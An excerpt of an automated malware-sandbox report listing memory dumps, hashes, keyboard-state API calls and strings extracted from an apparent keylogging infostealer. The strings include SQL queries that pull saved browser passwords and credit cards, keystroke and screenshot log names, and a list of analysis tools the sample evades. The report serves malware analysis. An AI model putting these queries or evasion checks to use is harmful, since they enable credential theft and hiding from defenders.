                                                                                        • Instruction ID: a9946641f7127771fb64efe84c8eb6520cf9ac9fe97b3392e3d6b8739c5bf630
                                                                                        • Opcode Fuzzy Hash: c7dd174426a4f66edf3a7771daf9b85ef99f06db188ae05cfb473cd416e7e962
                                                                                        • Instruction Fuzzy Hash: B6210071604200DFDF59DF68E980B26BF65EB88314F20C569DD1A4B256C33AD407CB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262980129.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_115d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ba923628048b09607900ddb8cf967d2431e4b3ba7ebbde702e720d5a509c9469
                                                                                        • Instruction ID: f55e164dd76cd91705e6c06cd69ea9611061c985bcab4e00abf3281ef1cab192
                                                                                        • Opcode Fuzzy Hash: ba923628048b09607900ddb8cf967d2431e4b3ba7ebbde702e720d5a509c9469
                                                                                        • Instruction Fuzzy Hash: B721AC75509380CFDB07CF24D994B15BF71EB46214F28C5EAD8498B2A7C33AD80ACB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262873894.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_114d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction ID: 1ed3698094193071afc210ffac5ffa8191370d5735bea7958a8d03e505c4585a
                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction Fuzzy Hash: EC11CD76404240CFDF06CF54D5C4B56BF61FB94224F28C6A9D9090A656C33AE45ACBA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262873894.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_114d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction ID: 72b6e997d8ab8c47f76ad8214ed15c5724670d0c504fec7dc638aec49a2cf086
                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction Fuzzy Hash: 5D11CD72504280CFCF06CF54E5C4B16BF71FB98614F24C6A9D9490B256C336D45ACBA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262980129.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_115d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction ID: ebefb513306f4e1a89a743234af7964f533b8db1372f8374952af6211b056d6d
                                                                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                        • Instruction Fuzzy Hash: EA11BB75504280DFDB06CF54D5C4B15BFA1FB84224F24C6ADDC494B296C33AD44ACB62
                                                                                        APIs
                                                                                        • GetKeyState.USER32(00000001), ref: 0BF91855
                                                                                        • GetKeyState.USER32(00000002), ref: 0BF9189A
                                                                                        • GetKeyState.USER32(00000004), ref: 0BF918DF
                                                                                        • GetKeyState.USER32(00000005), ref: 0BF91924
                                                                                        • GetKeyState.USER32(00000006), ref: 0BF91969
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: State
                                                                                        • String ID:
                                                                                        • API String ID: 1649606143-0
                                                                                        • Opcode ID: 75f92de9eb8e9d8bd6d321a8dee8a814808ae985fc81775b3e2be57408e34a1f
                                                                                        • Instruction ID: b4bcdcb327b2839603a7b6419dad0b6519639ee6da70cce4d1d4182f8131f397
                                                                                        • Opcode Fuzzy Hash: 75f92de9eb8e9d8bd6d321a8dee8a814808ae985fc81775b3e2be57408e34a1f
                                                                                        • Instruction Fuzzy Hash: 7C5183B2C017469EEF11DF99E4483AFBFF4AB05705F148459D148B7290C3B99685CBA1
                                                                                        APIs
                                                                                        • GetKeyState.USER32(00000001), ref: 0BF91855
                                                                                        • GetKeyState.USER32(00000002), ref: 0BF9189A
                                                                                        • GetKeyState.USER32(00000004), ref: 0BF918DF
                                                                                        • GetKeyState.USER32(00000005), ref: 0BF91924
                                                                                        • GetKeyState.USER32(00000006), ref: 0BF91969
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: State
                                                                                        • String ID:
                                                                                        • API String ID: 1649606143-0
                                                                                        • Opcode ID: 478ba49c2384275b6d76b313880a2f0eb50c86eabdda6672f53d7e3f02568da1
                                                                                        • Instruction ID: 99905d227907a076d1f20c504e5fa6ec3afb3bd14983128c7c8936bc9a5b338c
                                                                                        • Opcode Fuzzy Hash: 478ba49c2384275b6d76b313880a2f0eb50c86eabdda6672f53d7e3f02568da1
                                                                                        • Instruction Fuzzy Hash: 8F4172B1C017469EEB20DF9AE4483AFBFF4AB04709F248459D149B7290C3B99285CBE1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $(&]q$(aq$Haq
                                                                                        • API String ID: 0-1574058083
                                                                                        • Opcode ID: fd683d0703de832c26df2bb825fb6e98921299cf7511bde13e57556ae2a83228
                                                                                        • Instruction ID: 00dfb142cb4088599444b62a0c76938459769c33f7349499c9087aefb7c86b84
                                                                                        • Opcode Fuzzy Hash: fd683d0703de832c26df2bb825fb6e98921299cf7511bde13e57556ae2a83228
                                                                                        • Instruction Fuzzy Hash: 9D917DB1E002199FDB18DF69C8549AFBAF6EF88710F148929E415EB350DF35D906CBA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fff?
                                                                                        • API String ID: 0-4136771917
                                                                                        • Opcode ID: 9cbbc8348238205332e99c36872eea12984e2d9abb00245909202768510a937c
                                                                                        • Instruction ID: a7b9119b0ec8a97feca389d76c7fc51eac49fec2be71b5b2bf21e737392fede1
                                                                                        • Opcode Fuzzy Hash: 9cbbc8348238205332e99c36872eea12984e2d9abb00245909202768510a937c
                                                                                        • Instruction Fuzzy Hash: 3F62497681061ADFCF11DF90C888AD9B7B2FF99300F1586D5E9086B125E771AAD6CF80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • API String ID: 0-1822258774
                                                                                        • Opcode ID: 80f447dd28fc74389843a3b37e0a5142759b6d9cd5ddded5e4b9b29f89166dc6
                                                                                        • Instruction ID: ad1267573a6cbcfa6a1944d51b73f01fb3663915fd693bddd800a8e386d41722
                                                                                        • Opcode Fuzzy Hash: 80f447dd28fc74389843a3b37e0a5142759b6d9cd5ddded5e4b9b29f89166dc6
                                                                                        • Instruction Fuzzy Hash: 6EC3F6B59002199FDB64DF54CD88BDEB7B8FB48304F1081EAE50AA72A0DB745B85CF94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • API String ID: 0-3702532575
                                                                                        • Opcode ID: 1782ef946e4027905788cb2f93abb2c37d4dd656371e1beda9b32e140631c302
                                                                                        • Instruction ID: ecbd6ae258b5a8e10d75fcdd76cc5336fc622d7046395050630960346d01e7e5
                                                                                        • Opcode Fuzzy Hash: 1782ef946e4027905788cb2f93abb2c37d4dd656371e1beda9b32e140631c302
                                                                                        • Instruction Fuzzy Hash: 99A30675900218DFDB24DF94DD88BDEB7B5FB48304F1081AAE50AB72A0DB745A8ACF54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • API String ID: 0-1876354236
                                                                                        • Opcode ID: d22aca920e5646f1c6d71b63934413f37390d0f7b441083f7d2aa3adf539b840
                                                                                        • Instruction ID: 6b8a15204438c86ed8a95272a29ac8c5957484cdf9bf360818a9a4bc2401bab9
                                                                                        • Opcode Fuzzy Hash: d22aca920e5646f1c6d71b63934413f37390d0f7b441083f7d2aa3adf539b840
                                                                                        • Instruction Fuzzy Hash: 5D13F875A00218DFDB24DF60DD88BDEB779BB48304F1081EAE50AB6260EB745B89CF55
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .BMP$001A1924382A1816$041920022A3236$081C2D120E1D10$0C38240327$0F31341E3E342209$173B001726332E2A$1B3020343D3E3115210E0B3836$22133F0535201D10182B12$242D291A24103127$273A3821201B37211D1A$2831160E35193638060D3B19$2D160E112F302F311F062011$31006B092E303634171D111D0B$6:@$7B1A1938$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$Add$DC-KL$DXXuZPtFhondFBXdJuouXXNThQaRlZD$MgBEYGSBAexSrsCosGapgabSXuGhmqIQeretgysOxb$QGvOiCWEQFcIEEuTtfojVvW$TCuwPYIleynnJOtdWuMHDJGgZWsFRXWgGJViSeAeoCc$TnYCAzdjcQGm$\KeyData.Log$\Screenshot$cAaZaPNiyyGaTTavjDwSYsQLKBKshhaepY$ciHZiEwTTCBUmvkjIFDBFouIEtnVBLYW$gSzQgzUVhRXMbtcGggTehdsSnHcYHDxsSaZubRTbN$gXBYDIQftMbnLEuPrkdvW$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR$nJQHfTiYjEvrbDtdfCRMwZBOeTFJpSfeE$ntYJDEuDIrnNYYYdTSImaLyNMbtVWJUj$pUnaLwEsVmkGcweXpdooR$rCyTVoiqsUNwEMbuttbPvdXylgyYMXqNO
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 031A131500020622566853$12283A02321C16344C7E51$330201260D09352705381D666B42$35627D$3F6052$HVivgnckGvRsRU$SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$SELECT origin_url, username_value, password_value FROM logins$SELECT origin_url, username_value, password_value, length(password_value) FROM logins$TX@$TX@$TX@$TX@$YCSMLssvpbsNz$b$cIQcgPyaCLuuhXPkgYdIkKlqZurEFKprFYRahTMJqkyB$d$grrqJdjTSlWsFQbHmCcsaK$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr$|Z@
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 001A1924382A1816$041920022A3236$081C2D120E1D10$0C38240327$173B001726332E2A$1B3020343D3E3115210E0B3836$22133F0535201D10182B12$242D291A24103127$273A3821201B37211D1A$2D160E112F302F311F062011$C$QGvOiCWEQFcIEEuTtfojVvW$TCuwPYIleynnJOtdWuMHDJGgZWsFRXWgGJViSeAeoCc$TnYCAzdjcQGm$cAaZaPNiyyGaTTavjDwSYsQLKBKshhaepY$ciHZiEwTTCBUmvkjIFDBFouIEtnVBLYW$gXBYDIQftMbnLEuPrkdvW$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR$nJQHfTiYjEvrbDtdfCRMwZBOeTFJpSfeE$ntYJDEuDIrnNYYYdTSImaLyNMbtVWJUj$rCyTVoiqsUNwEMbuttbPvdXylgyYMXqNO
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2$H2@$apatedns$autoit$autoruns$fiddler$idaq$procexp$procmon$tcpview$vmtools$vxstream$windbg$wireshark
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$14141D0C1138091F160637213C1A091D$2F01190B38020907$@4@$OsBvdSkltaNPoHevPpOxCFumuDkgiqYOE$RHPxjpMekJEXNWslnFcsCdZ$l$|Z@$|Z@$|Z@$V
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 173B001726332E2A$2D160E112F302F311F062011$6E4E507A5B5B56746D6B4E0937001A1D1C20273A0D080E11101C27643C1A13151113331156171D3D07091568323B$6F4E517D5F5D5070626F$782F2523$@1@$@1@$TnYCAzdjcQGm$VVULSSfjoivMBiLiukOSh$kYybOkhfFTYtHvFRDhqrmIlAyYwHVxSblt$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$14141D0C1138091F160637213C1A091D$2F01190B38020907$OsBvdSkltaNPoHevPpOxCFumuDkgiqYOE$RHPxjpMekJEXNWslnFcsCdZ$l$|Z@$|Z@$|Z@$V
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$14141D0C1138091F160637213C1A091D$2F01190B38020907$OsBvdSkltaNPoHevPpOxCFumuDkgiqYOE$RHPxjpMekJEXNWslnFcsCdZ$l$|Z@$|Z@$|Z@
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0805082D312111482B272514$0E01003A033D22671027310935$133A0B3D023B3D077F1E381500073D$23051C3F142E3B4A2D0F0D$AejdRuGWdHwhHBpojiHLXZdctJmTbHTJ$C:\\$TTigJXObfATJzEhJqRthEtfg$YOIbZlTStQmIyisXUwuDhMCo$eYRcHjMVICOT
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0E290A293238$2F2B381801194C2F073C$DC-FG$LsmQtdjbUnLqBfgzgkwVWSG$Pdc$qRocEWKSoHuyol$|Z@
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_412000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1F32083F021A2B181A152110041A6F13161810$l$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg$t$v$V
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2831160E35193638060D3B19$31006B092E303634171D111D0B$6:@$Add$DXXuZPtFhondFBXdJuouXXNThQaRlZD$MgBEYGSBAexSrsCosGapgabSXuGhmqIQeretgysOxb
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0C3925$0F0F281F03350A$1C191F$OnmybAUJihWWHpfKIzVsEep$iSIAsfFVTHbMefBPJosuMMuqdTaSMjh$iyMFEGGxQQyEzQFmIgEKtXo
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !@$0805082D312111482B272514$133A0B3D023B3D077F1E381500073D$TTigJXObfATJzEhJqRthEtfg$YOIbZlTStQmIyisXUwuDhMCo
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$0$2B102B0F0933427074230A350158222E0459753D193B28082F181D07141319330737$<$lxuGjjGbZTExZ
                                                                                        Strings
                                                                                        • eWatgqGwCCMaqagFyYkPRproVLyeigUgxp, xrefs: 004349BA
                                                                                        • 1B1D1B7B292811305942, xrefs: 00434AA0
                                                                                        • 355740, xrefs: 00434998
                                                                                        • KytuUKIbUovEgoAnvEtEVZIxsIXSxLZy, xrefs: 00434AC2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Offset: 00434000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_434000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1B1D1B7B292811305942$355740$KytuUKIbUovEgoAnvEtEVZIxsIXSxLZy$eWatgqGwCCMaqagFyYkPRproVLyeigUgxp
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_412000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1F32083F021A2B181A152110041A6F13161810$l$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg$V
                                                                                        • API String ID: 0-1707604464
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_412000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1F32083F021A2B181A152110041A6F13161810$l$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg$V
                                                                                        • API String ID: 0-1707604464
                                                                                        Strings
                                                                                        • ZORMlSDSfGqJCV, xrefs: 0040F27F
                                                                                        • OZSsDdFxvhGXMjSvYQkREMxuilBURZcZ, xrefs: 0040F252
                                                                                        • 01103F0D340437373A03057156, xrefs: 0040F20E
                                                                                        • 716C162F1F0D0324083018070B, xrefs: 0040F230
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 01103F0D340437373A03057156$716C162F1F0D0324083018070B$OZSsDdFxvhGXMjSvYQkREMxuilBURZcZ$ZORMlSDSfGqJCV
                                                                                        • API String ID: 0-628392983
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Offset: 00416000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_416000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 3920201E271B410D2F1710$EelOyNuaINcq$[
                                                                                        • API String ID: 0-4079878343
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_412000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1F32083F021A2B181A152110041A6F13161810$l$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg
                                                                                        • API String ID: 0-3616958960
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .BMP$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$\Screenshot
                                                                                        • API String ID: 0-1503909677
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Offset: 00416000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_416000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: S$l
                                                                                        • API String ID: 0-1918003502
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Offset: 00416000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_416000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: S$l
                                                                                        • API String ID: 0-1918003502
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_438000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0@$ 0@
                                                                                        • API String ID: 0-2967449836
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *.*$Pdc
                                                                                        • API String ID: 0-3601883863
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_438000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0@$ 0@
                                                                                        • API String ID: 0-2967449836
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *.*$Pdc
                                                                                        • API String ID: 0-3601883863
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: h1@
                                                                                        • API String ID: 0-151258536
                                                                                        Strings
